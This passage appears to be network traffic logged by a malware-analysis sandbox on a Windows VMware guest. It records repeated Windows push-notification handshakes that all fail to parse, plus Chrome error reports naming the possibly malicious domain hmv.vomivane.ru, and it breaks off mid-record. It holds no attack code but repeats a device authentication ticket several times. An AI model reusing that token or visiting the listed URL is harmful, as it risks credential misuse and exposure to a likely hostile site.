<connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
2024-12-19 19:20:52 UTC	1084	OUT	Data Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 36 31 0d 0a 4d 53 2d 43 56 3a 20 6f 55 6c 42 2b 5a 54 50 70 45 43 71 77 2f 4b 55 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 61 33 33 36 35 35 31 32 37 32 34 39 65 35 62 66 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 34 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 65 37 33 70 6a 43 66 4b 2b 45 44 33 4f 55 4a 65 76 57 5a 50 33 6b 37 65 72 61 71 6e 67 6e 56 55 76 57 47 6e 58 4c 2b 74 6e 6a 4c 34 68 74 79 74 41 30 30 49 46 33 57 71 71 74 32 50 50 53 68 41 54 31 32 6c 6b 64 61 4b 6a 49 34 54 35 51 6c 33 72 41 53 79 51 6c 72 36 6b 34 49 35 6d 32 64 71 57 6c 63 4b 50 4e 75 67 68 50 65 47 41 Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: oUlB+ZTPpECqw/KU.2Context: a33655127249e5bf<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAe73pjCfK+ED3OUJevWZP3k7eraqngnVUvWGnXL+tnjL4htytA00IF3Wqqt2PPShAT12lkdaKjI4T5Ql3rASyQlr6k4I5m2dqWlcKPNughPeGA
2024-12-19 19:20:52 UTC	218	OUT	Data Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 6f 55 6c 42 2b 5a 54 50 70 45 43 71 77 2f 4b 55 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 61 33 33 36 35 35 31 32 37 32 34 39 65 35 62 66 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e Data Ascii: BND 3 CON\WNS 0 197MS-CV: oUlB+ZTPpECqw/KU.3Context: a33655127249e5bf<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
2024-12-19 19:20:52 UTC	14	IN	Data Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a Data Ascii: 202 1 CON 58
2024-12-19 19:20:52 UTC	58	IN	Data Raw: 4d 53 2d 43 56 3a 20 62 62 35 4a 51 36 50 73 46 30 79 5a 76 74 33 6b 55 59 2f 44 4c 51 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e Data Ascii: MS-CV: bb5JQ6PsF0yZvt3kUY/DLQ.0Payload parsing failed.

Session ID	Source IP	Source Port	Destination IP	Destination Port
12	192.168.2.6	49815	20.198.118.190	443

Timestamp	Bytes transferred	Direction	Data
2024-12-19 19:21:07 UTC	71	OUT	Data Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 44 63 45 55 5a 6b 30 67 4f 55 65 37 56 64 2f 53 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 32 61 32 63 66 63 62 35 33 36 64 63 30 65 30 61 0d 0a 0d 0a Data Ascii: CNT 1 CON 305MS-CV: DcEUZk0gOUe7Vd/S.1Context: 2a2cfcb536dc0e0a
2024-12-19 19:21:07 UTC	249	OUT	Data Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
2024-12-19 19:21:07 UTC	1084	OUT	Data Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 36 31 0d 0a 4d 53 2d 43 56 3a 20 44 63 45 55 5a 6b 30 67 4f 55 65 37 56 64 2f 53 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 32 61 32 63 66 63 62 35 33 36 64 63 30 65 30 61 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 34 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 65 37 33 70 6a 43 66 4b 2b 45 44 33 4f 55 4a 65 76 57 5a 50 33 6b 37 65 72 61 71 6e 67 6e 56 55 76 57 47 6e 58 4c 2b 74 6e 6a 4c 34 68 74 79 74 41 30 30 49 46 33 57 71 71 74 32 50 50 53 68 41 54 31 32 6c 6b 64 61 4b 6a 49 34 54 35 51 6c 33 72 41 53 79 51 6c 72 36 6b 34 49 35 6d 32 64 71 57 6c 63 4b 50 4e 75 67 68 50 65 47 41 Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: DcEUZk0gOUe7Vd/S.2Context: 2a2cfcb536dc0e0a<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAe73pjCfK+ED3OUJevWZP3k7eraqngnVUvWGnXL+tnjL4htytA00IF3Wqqt2PPShAT12lkdaKjI4T5Ql3rASyQlr6k4I5m2dqWlcKPNughPeGA
2024-12-19 19:21:07 UTC	218	OUT	Data Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 44 63 45 55 5a 6b 30 67 4f 55 65 37 56 64 2f 53 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 32 61 32 63 66 63 62 35 33 36 64 63 30 65 30 61 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e Data Ascii: BND 3 CON\WNS 0 197MS-CV: DcEUZk0gOUe7Vd/S.3Context: 2a2cfcb536dc0e0a<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
2024-12-19 19:21:07 UTC	14	IN	Data Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a Data Ascii: 202 1 CON 58
2024-12-19 19:21:07 UTC	58	IN	Data Raw: 4d 53 2d 43 56 3a 20 76 4f 70 4f 64 4c 69 65 67 6b 43 6b 73 31 64 57 73 6c 46 43 5a 41 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e Data Ascii: MS-CV: vOpOdLiegkCks1dWslFCZA.0Payload parsing failed.

Session ID	Source IP	Source Port	Destination IP	Destination Port
13	192.168.2.6	49869	20.198.118.190	443

Timestamp	Bytes transferred	Direction	Data
2024-12-19 19:21:29 UTC	71	OUT	Data Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 49 38 54 6c 2b 64 66 44 42 45 57 51 52 77 34 4a 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 66 32 34 38 35 61 37 31 33 31 37 38 33 65 39 31 0d 0a 0d 0a Data Ascii: CNT 1 CON 305MS-CV: I8Tl+dfDBEWQRw4J.1Context: f2485a7131783e91
2024-12-19 19:21:29 UTC	249	OUT	Data Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
2024-12-19 19:21:29 UTC	1084	OUT	Data Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 36 31 0d 0a 4d 53 2d 43 56 3a 20 49 38 54 6c 2b 64 66 44 42 45 57 51 52 77 34 4a 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 66 32 34 38 35 61 37 31 33 31 37 38 33 65 39 31 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 34 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 65 37 33 70 6a 43 66 4b 2b 45 44 33 4f 55 4a 65 76 57 5a 50 33 6b 37 65 72 61 71 6e 67 6e 56 55 76 57 47 6e 58 4c 2b 74 6e 6a 4c 34 68 74 79 74 41 30 30 49 46 33 57 71 71 74 32 50 50 53 68 41 54 31 32 6c 6b 64 61 4b 6a 49 34 54 35 51 6c 33 72 41 53 79 51 6c 72 36 6b 34 49 35 6d 32 64 71 57 6c 63 4b 50 4e 75 67 68 50 65 47 41 Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: I8Tl+dfDBEWQRw4J.2Context: f2485a7131783e91<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAe73pjCfK+ED3OUJevWZP3k7eraqngnVUvWGnXL+tnjL4htytA00IF3Wqqt2PPShAT12lkdaKjI4T5Ql3rASyQlr6k4I5m2dqWlcKPNughPeGA
2024-12-19 19:21:29 UTC	218	OUT	Data Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 49 38 54 6c 2b 64 66 44 42 45 57 51 52 77 34 4a 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 66 32 34 38 35 61 37 31 33 31 37 38 33 65 39 31 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e Data Ascii: BND 3 CON\WNS 0 197MS-CV: I8Tl+dfDBEWQRw4J.3Context: f2485a7131783e91<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
2024-12-19 19:21:30 UTC	14	IN	Data Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a Data Ascii: 202 1 CON 58
2024-12-19 19:21:30 UTC	58	IN	Data Raw: 4d 53 2d 43 56 3a 20 66 37 79 48 50 63 78 58 68 45 65 33 66 61 57 67 5a 30 4e 43 6c 51 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e Data Ascii: MS-CV: f7yHPcxXhEe3faWgZ0NClQ.0Payload parsing failed.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.6	49892	35.190.80.1	443	3060	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-19 19:21:38 UTC	536	OUT	OPTIONS /report/v4?s=Ty4JtuEq9zH3JnwYhtqmx5PhAv%2B%2FaN4BSTi3NvDrv57vmYCGoVFKAwxSqb7XeHBQ2oiR1q43nEaQ7Rv8F%2B96jFwbTvoO%2BmVPG01I3m1hVfdT9dBJ049Xskca1MeHQA%3D%3D HTTP/1.1 Host: a.nel.cloudflare.com Connection: keep-alive Origin: https://hmv.vomivane.ru Access-Control-Request-Method: POST Access-Control-Request-Headers: content-type User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-12-19 19:21:39 UTC	336	IN	HTTP/1.1 200 OK Content-Length: 0 access-control-max-age: 86400 access-control-allow-methods: POST, OPTIONS access-control-allow-origin: * access-control-allow-headers: content-length, content-type date: Thu, 19 Dec 2024 19:21:38 GMT Via: 1.1 google Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.6	49897	35.190.80.1	443	3060	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-19 19:21:40 UTC	478	OUT	POST /report/v4?s=Ty4JtuEq9zH3JnwYhtqmx5PhAv%2B%2FaN4BSTi3NvDrv57vmYCGoVFKAwxSqb7XeHBQ2oiR1q43nEaQ7Rv8F%2B96jFwbTvoO%2BmVPG01I3m1hVfdT9dBJ049Xskca1MeHQA%3D%3D HTTP/1.1 Host: a.nel.cloudflare.com Connection: keep-alive Content-Length: 432 Content-Type: application/reports+json User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-12-19 19:21:40 UTC	432	OUT	Data Raw: 5b 7b 22 61 67 65 22 3a 35 36 35 32 39 2c 22 62 6f 64 79 22 3a 7b 22 65 6c 61 70 73 65 64 5f 74 69 6d 65 22 3a 33 34 31 38 2c 22 6d 65 74 68 6f 64 22 3a 22 47 45 54 22 2c 22 70 68 61 73 65 22 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 22 2c 22 70 72 6f 74 6f 63 6f 6c 22 3a 22 68 74 74 70 2f 31 2e 31 22 2c 22 72 65 66 65 72 72 65 72 22 3a 22 68 74 74 70 73 3a 2f 2f 68 6d 76 2e 76 6f 6d 69 76 61 6e 65 2e 72 75 2f 32 62 38 77 6a 56 2f 22 2c 22 73 61 6d 70 6c 69 6e 67 5f 66 72 61 63 74 69 6f 6e 22 3a 31 2e 30 2c 22 73 65 72 76 65 72 5f 69 70 22 3a 22 31 37 32 2e 36 37 2e 31 33 34 2e 32 35 22 2c 22 73 74 61 74 75 73 5f 63 6f 64 65 22 3a 34 30 34 2c 22 74 79 70 65 22 3a 22 68 74 74 70 2e 65 72 72 6f 72 22 7d 2c 22 74 79 70 65 22 3a 22 6e 65 74 77 6f 72 6b 2d 65 72 Data Ascii: [{"age":56529,"body":{"elapsed_time":3418,"method":"GET","phase":"application","protocol":"http/1.1","referrer":"https://hmv.vomivane.ru/2b8wjV/","sampling_fraction":1.0,"server_ip":"172.67.134.25","status_code":404,"type":"http.error"},"type":"network-er
2024-12-19 19:21:40 UTC	168	IN	HTTP/1.1 200 OK Content-Length: 0 date: Thu, 19 Dec 2024 19:21:40 GMT Via: 1.1 google Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port
16	192.168.2.6	49927	20.198.118.190	443

Timestamp	Bytes transferred	Direction	Data
2024-12-19 19:21:53 UTC	71	OUT	Data Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 54 70 4d 44 41 30 30 4d 48 55 69 34 4b 46 31 31 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 33 36 33 61 32 63 31 32 31 34 63 30 61 31 31 30 0d 0a 0d 0a Data Ascii: CNT 1 CON 305MS-CV: TpMDA00MHUi4KF11.1Context: 363a2c1214c0a110
2024-12-19 19:21:53 UTC	249	OUT	Data Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
2024-12-19 19:21:53 UTC	1084	OUT	Data Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 36 31 0d 0a 4d 53 2d 43 56 3a 20 54 70 4d 44 41 30 30 4d 48 55 69 34 4b 46 31 31 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 33 36 33 61 32 63 31 32 31 34 63 30 61 31 31 30 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 34 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 65 37 33 70 6a 43 66 4b 2b 45 44 33 4f 55 4a 65 76 57 5a 50 33 6b 37 65 72 61 71 6e 67 6e 56 55 76 57 47 6e 58 4c 2b 74 6e 6a 4c 34 68 74 79 74 41 30 30 49 46 33 57 71 71 74 32 50 50 53 68 41 54 31 32 6c 6b 64 61 4b 6a 49 34 54 35 51 6c 33 72 41 53 79 51 6c 72 36 6b 34 49 35 6d 32 64 71 57 6c 63 4b 50 4e 75 67 68 50 65 47 41 Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: TpMDA00MHUi4KF11.2Context: 363a2c1214c0a110<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAe73pjCfK+ED3OUJevWZP3k7eraqngnVUvWGnXL+tnjL4htytA00IF3Wqqt2PPShAT12lkdaKjI4T5Ql3rASyQlr6k4I5m2dqWlcKPNughPeGA
2024-12-19 19:21:53 UTC	218	OUT	Data Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 54 70 4d 44 41 30 30 4d 48 55 69 34 4b 46 31 31 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 33 36 33 61 32 63 31 32 31 34 63 30 61 31 31 30 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e Data Ascii: BND 3 CON\WNS 0 197MS-CV: TpMDA00MHUi4KF11.3Context: 363a2c1214c0a110<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
2024-12-19 19:21:54 UTC	14	IN	Data Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a Data Ascii: 202 1 CON 58
2024-12-19 19:21:54 UTC	58	IN	Data Raw: 4d 53 2d 43 56 3a 20 38 69 61 59 6d 77 70 65 58 45 43 57 4f 4e 77 65 33 75 64 7a 42 41 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e Data Ascii: MS-CV: 8iaYmwpeXECWONwe3udzBA.0Payload parsing failed.

Session ID	Source IP	Source Port	Destination IP	Destination Port
17	192.168.2.6	49990	20.198.118.190	443

Timestamp	Bytes transferred	Direction	Data
2024-12-19 19:22:21 UTC	71	OUT	Data Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 7a 72 2f 6b 43 47 70 6a 4d 6b 79 7a 52 32 63 78 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 38 38 30 34 30 39 39 33 31 38 38 35 36 32 33 31 0d 0a 0d 0a Data Ascii: CNT 1 CON 305MS-CV: zr/kCGpjMkyzR2cx.1Context: 8804099318856231
2024-12-19 19:22:21 UTC	249	OUT	Data Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
2024-12-19 19:22:21 UTC	1084	OUT	Data Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 36 31 0d 0a 4d 53 2d 43 56 3a 20 7a 72 2f 6b 43 47 70 6a 4d 6b 79 7a 52 32 63 78 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 38 38 30 34 30 39 39 33 31 38 38 35 36 32 33 31 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 34 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 65 37 33 70 6a 43 66 4b 2b 45 44 33 4f 55 4a 65 76 57 5a 50 33 6b 37 65 72 61 71 6e 67 6e 56 55 76 57 47 6e 58 4c 2b 74 6e 6a 4c 34 68 74 79 74 41 30 30 49 46 33 57 71 71 74 32 50 50 53 68 41 54 31 32 6c 6b 64 61 4b 6a 49 34 54 35 51 6c 33 72 41 53 79 51 6c 72 36 6b 34 49 35 6d 32 64 71 57 6c 63 4b 50 4e 75 67 68 50 65 47 41 Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: zr/kCGpjMkyzR2cx.2Context: 8804099318856231<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAe73pjCfK+ED3OUJevWZP3k7eraqngnVUvWGnXL+tnjL4htytA00IF3Wqqt2PPShAT12lkdaKjI4T5Ql3rASyQlr6k4I5m2dqWlcKPNughPeGA
2024-12-19 19:22:21 UTC	218	OUT	Data Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 7a 72 2f 6b 43 47 70 6a 4d 6b 79 7a 52 32 63 78 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 38 38 30 34 30 39 39 33 31 38 38 35 36 32 33 31 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 